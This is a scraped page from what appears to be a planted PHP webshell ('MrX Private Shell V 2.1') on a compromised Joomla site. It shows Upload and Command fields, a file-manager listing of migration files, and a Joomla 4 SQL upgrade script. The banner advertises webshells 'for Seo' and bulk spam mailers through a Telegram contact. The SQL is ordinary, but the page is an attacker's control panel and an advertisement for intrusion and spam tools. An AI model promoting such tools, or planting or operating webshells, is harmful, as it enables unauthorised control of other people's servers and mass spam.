__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
-- The following statement was moved from below to here and modified for 4.1.1 by adding the "/** CAN FAIL **/" installer hint.
-- See https://github.com/joomla/joomla-cms/pull/37156
ALTER TABLE `#__extensions` DROP COLUMN `system_data` /** CAN FAIL **/;

-- From 4.0.0-2016-07-03.sql
-- The following statement was modified for 4.1.1 by removing the `system_data` column.
-- See https://github.com/joomla/joomla-cms/pull/37156
INSERT INTO `#__extensions` (`name`, `type`, `element`, `folder`, `client_id`, `enabled`, `access`, `protected`, `manifest_cache`, `params`, `custom_data`, `checked_out`, `checked_out_time`, `ordering`, `state`) VALUES
('plg_behaviour_taggable', 'plugin', 'taggable', 'behaviour', 0, 1, 1, 0, '', '{}', '', 0, '0000-00-00 00:00:00', 0, 0),
('plg_behaviour_versionable', 'plugin', 'versionable', 'behaviour', 0, 1, 1, 0, '', '{}', '', 0, '0000-00-00 00:00:00', 0, 0);

-- From 4.0.0-2016-09-22.sql
DELETE FROM `#__extensions` WHERE `type` = 'library' AND `element` = 'phputf8';

-- From 4.0.0-2016-09-28.sql
DELETE FROM `#__extensions` WHERE `type` = 'plugin' AND `element` = 'p3p' AND `folder` = 'system';

-- From 4.0.0-2016-10-02.sql
-- The following statement was modified for 4.1.1 by adding the "/** CAN FAIL **/" installer hint.
-- See https://github.com/joomla/joomla-cms/pull/37156
ALTER TABLE `#__user_keys` DROP COLUMN `invalid` /** CAN FAIL **/;

--
-- Insert the new templates into the database. Set as home if the old template is the active one
--

-- The following statement was modified for 4.1.1 by removing the `system_data` column.
-- See https://github.com/joomla/joomla-cms/pull/37156
INSERT INTO `#__extensions` (`name`, `type`, `element`, `folder`, `client_id`, `enabled`, `access`, `protected`, `manifest_cache`, `params`, `custom_data`, `checked_out`, `checked_out_time`, `ordering`, `state`) VALUES
('atum', 'template', 'atum', '', 1, 1, 1, 0, '{}', '{}', '', 0, '0000-00-00 00:00:00', 0, 0),
('cassiopeia', 'template', 'cassiopeia', '', 0, 1, 1, 0, '{}', '{}', '', 0, '0000-00-00 00:00:00', 0, 0);

-- The following statement had to be modified for 4.1 by adding the `inheritable` and `parent` columns.
-- See https://github.com/joomla/joomla-cms/pull/36585
INSERT INTO `#__template_styles` (`template`, `client_id`, `home`, `title`, `inheritable`, `parent`, `params`) VALUES
('atum', 1, (CASE WHEN (SELECT b.`count` FROM (SELECT count(a.`id`) AS `count` FROM `#__template_styles` a WHERE a.`home` = '1' AND a.`client_id` = 1 AND a.`template` IN ('isis', 'hathor')) AS b) = 0 THEN '0' ELSE '1' END), 'atum - Default', 1, '', '{}'),
('cassiopeia', 0, (CASE WHEN (SELECT d.`count` FROM (SELECT count(c.`id`) AS `count` FROM `#__template_styles` c WHERE c.`home` = '1' AND c.`client_id` = 0 AND c.`template` IN ('protostar', 'beez3')) AS d) = 0 THEN '0' ELSE '1' END), 'cassiopeia - Default', 1, '', '{}');

--
-- Move mod_version to the right position for the atum template
--
UPDATE `#__modules` SET `position` = 'status' WHERE `module` = 'mod_version' AND `client_id` = 1;

--
-- Now we can clean up the old templates
--
DELETE FROM `#__extensions` WHERE `type` = 'template' AND `element` = 'hathor' AND `client_id` = 1;
DELETE FROM `#__template_styles` WHERE `template` = 'hathor' AND `client_id` = 1;

DELETE FROM `#__extensions` WHERE `type` = 'template' AND `element` = 'isis' AND `client_id` = 1;
DELETE FROM `#__template_styles` WHERE `template` = 'isis' AND `client_id` = 1;

DELETE FROM `#__extensions` WHERE `type` = 'template' AND `element` = 'protostar' AND `client_id` = 0;
DELETE FROM `#__template_styles` WHERE `template` = 'protostar' AND `client_id` = 0;

DELETE FROM `#__extensions` WHERE `type` = 'template' AND `element` = 'beez3' AND `client_id` = 0;
DELETE FROM `#__template_styles` WHERE `template` = 'beez3' AND `client_id` = 0;

-- From 4.0.0-2016-10-03.sql
DELETE FROM `#__extensions` WHERE `name` = 'mod_submenu';

-- From 4.0.0-2017-03-18.sql
-- The following statement was moved to the top for 4.1.1.
-- See https://github.com/joomla/joomla-cms/pull/37156
-- ALTER TABLE `#__extensions` DROP COLUMN `system_data`;

-- From 4.0.0-2017-04-25.sql
INSERT INTO `#__extensions` (`name`, `type`, `element`, `folder`, `client_id`, `enabled`, `access`, `protected`, `manifest_cache`, `params`, `custom_data`, `checked_out`, `checked_out_time`, `ordering`, `state`) VALUES
('plg_filesystem_local', 'plugin', 'local', 'filesystem', 0, 1, 1, 0, '', '{}', '', 0, '0000-00-00 00:00:00', 0, 0),
('plg_media-action_crop', 'plugin', 'crop', 'media-action', 0, 1, 1, 0, '', '{}', '', 0, '0000-00-00 00:00:00', 0, 0),
('plg_media-action_resize', 'plugin', 'resize', 'media-action', 0, 1, 1, 0, '', '{}', '', 0, '0000-00-00 00:00:00', 0, 0),
('plg_media-action_rotate', 'plugin', 'rotate', 'media-action', 0, 1, 1, 0, '', '{}', '', 0, '0000-00-00 00:00:00', 0, 0);

-- From 4.0.0-2017-05-31.sql
UPDATE `#__menu` SET `link` = 'index.php?option=com_config&view=config' WHERE `link` = 'index.php?option=com_config&view=config&controller=config.display.config';
UPDATE `#__menu` SET `link` = 'index.php?option=com_config&view=templates' WHERE `link` = 'index.php?option=com_config&view=templates&controller=config.display.templates';

-- From 4.0.0-2017-06-03.sql
-- The following two statements were modified for 4.1.1 by adding the "/** CAN FAIL **/" installer hint.
-- See https://github.com/joomla/joomla-cms/pull/37156
ALTER TABLE `#__extensions` ADD COLUMN `changelogurl` text AFTER `element` /** CAN FAIL **/;
ALTER TABLE `#__updates` ADD COLUMN `changelogurl` text AFTER `infourl` /** CAN FAIL **/;

-- From 4.0.0-2017-10-10.sql
INSERT INTO `#__extensions` (`name`, `type`, `element`, `folder`, `client_id`, `enabled`, `access`, `protected`, `manifest_cache`, `params`, `custom_data`, `checked_out`, `checked_out_time`, `ordering`, `state`) VALUES
('plg_system_httpheaders', 'plugin', 'httpheaders', 'system', 0, 0, 1, 0, '', '{}', '', 0, '0000-00-00 00:00:00', 0, 0);

INSERT INTO `#__postinstall_messages` (`extension_id`, `title_key`, `description_key`, `action_key`, `language_extension`, `language_client_id`, `type`, `action_file`, `action`, `condition_file`, `condition_method`, `version_introduced`, `enabled`)
SELECT extension_id, 'PLG_SYSTEM_HTTPHEADERS_POSTINSTALL_INTRODUCTION_TITLE', 'PLG_SYSTEM_HTTPHEADERS_POSTINSTALL_INTRODUCTION_BODY', 'PLG_SYSTEM_HTTPHEADERS_POSTINSTALL_INTRODUCTION_ACTION', 'plg_system_httpheaders', 1, 'action', 'site://plugins/system/httpheaders/postinstall/introduction.php', 'httpheaders_postinstall_action', 'site://plugins/system/httpheaders/postinstall/introduction.php', 'httpheaders_postinstall_condition', '4.0.0', 1 FROM `#__extensions` WHERE `name` = 'files_joomla';

-- From 4.0.0-2018-02-24.sql
DELETE FROM `#__extensions` WHERE `type` = 'library' AND `element` = 'idna_convert';

-- From 4.0.0-2018-03-05.sql
ALTER TABLE `#__modules` CHANGE `content` `content` TEXT NULL;

Filemanager

Name Type Size Permission Actions
4.0.0-2018-03-05.sql File 6.73 KB 0664
4.0.0-2018-05-15.sql File 6.22 KB 0664
4.0.0-2018-07-19.sql File 1.7 KB 0664
4.0.0-2018-07-29.sql File 13.01 KB 0664
4.0.0-2018-08-29.sql File 1.45 KB 0664
4.0.0-2019-03-09.sql File 2.91 KB 0664
4.0.0-2019-03-30.sql File 483 B 0664
4.0.0-2019-04-15.sql File 899 B 0664
4.0.0-2019-04-22.sql File 1.71 KB 0664
4.0.0-2019-05-20.sql File 1.74 KB 0664
4.0.0-2019-06-29.sql File 3.69 KB 0664
4.0.0-2019-07-13.sql File 13.3 KB 0664
4.0.0-2019-09-13.sql File 3.99 KB 0664
4.0.0-2019-09-22.sql File 1.75 KB 0664
4.0.0-2019-10-06.sql File 6.48 KB 0664
4.0.0-2019-10-17.sql File 962 B 0664
4.0.0-2020-02-02.sql File 1.78 KB 0664
4.0.0-2020-03-10.sql File 1.38 KB 0664
4.0.0-2020-03-25.sql File 6.07 KB 0664
4.0.0-2020-05-29.sql File 5.43 KB 0664
4.0.0-2020-09-27.sql File 1.41 KB 0664
4.0.0-2020-12-20.sql File 6.11 KB 0664
4.0.0-2021-04-22.sql File 1.37 KB 0664
4.0.0-2021-04-27.sql File 1.95 KB 0664
4.0.0-2021-05-30.sql File 1.58 KB 0664
4.0.0-2021-06-04.sql File 226 B 0664
4.0.0-2021-08-13.sql File 1.42 KB 0664
4.0.0-2021-08-17.sql File 1.18 KB 0664
4.0.3-2021-09-04.sql File 1.88 KB 0664
4.0.3-2021-09-05.sql File 607 B 0664
4.0.6-2021-12-23.sql File 125 B 0664
4.1.0-2021-11-20.sql File 4.44 KB 0664
4.1.0-2021-11-28.sql File 429 B 0664
4.1.0-2021-12-29.sql File 329 B 0664
4.1.0-2022-01-08.sql File 205 B 0664
4.1.0-2022-01-19.sql File 337 B 0664
4.1.0-2022-01-24.sql File 338 B 0664
4.1.1-2022-02-20.sql File 106 B 0664
4.1.3-2022-04-07.sql File 486 B 0664
4.1.3-2022-04-08.sql File 124 B 0664
4.2.0-2022-05-15.sql File 3 KB 0664
4.2.0-2022-06-15.sql File 180 B 0664
4.2.0-2022-06-19.sql File 356 B 0664
4.2.0-2022-06-22.sql File 295 B 0664
4.2.0-2022-07-07.sql File 474 B 0664
4.2.1-2022-08-23.sql File 255 B 0664
4.2.3-2022-09-07.sql File 217 B 0664
4.2.7-2022-12-29.sql File 534 B 0664
4.2.9-2023-03-07.sql File 688 B 0664
4.3.0-2022-09-23.sql File 92 B 0664
4.3.0-2022-11-06.sql File 133 B 0664
4.3.0-2023-01-30.sql File 1.18 KB 0664
4.3.0-2023-02-15.sql File 36.92 KB 0664
4.3.0-2023-02-25.sql File 78 B 0664
4.3.0-2023-03-07.sql File 255 B 0664
4.3.0-2023-03-09.sql File 414 B 0664
4.3.0-2023-03-10.sql File 713 B 0664
4.3.0-2023-03-28.sql File 139 B 0664
4.3.0-2023-03-29.sql File 235 B 0664
4.3.2-2023-03-31.sql File 207 B 0664
4.3.2-2023-05-03.sql File 385 B 0664
4.3.2-2023-05-20.sql File 161 B 0664
4.4.0-2023-05-08.sql File 298 B 0664
4.4.0-2023-09-13.sql File 306 B 0664
Filemanager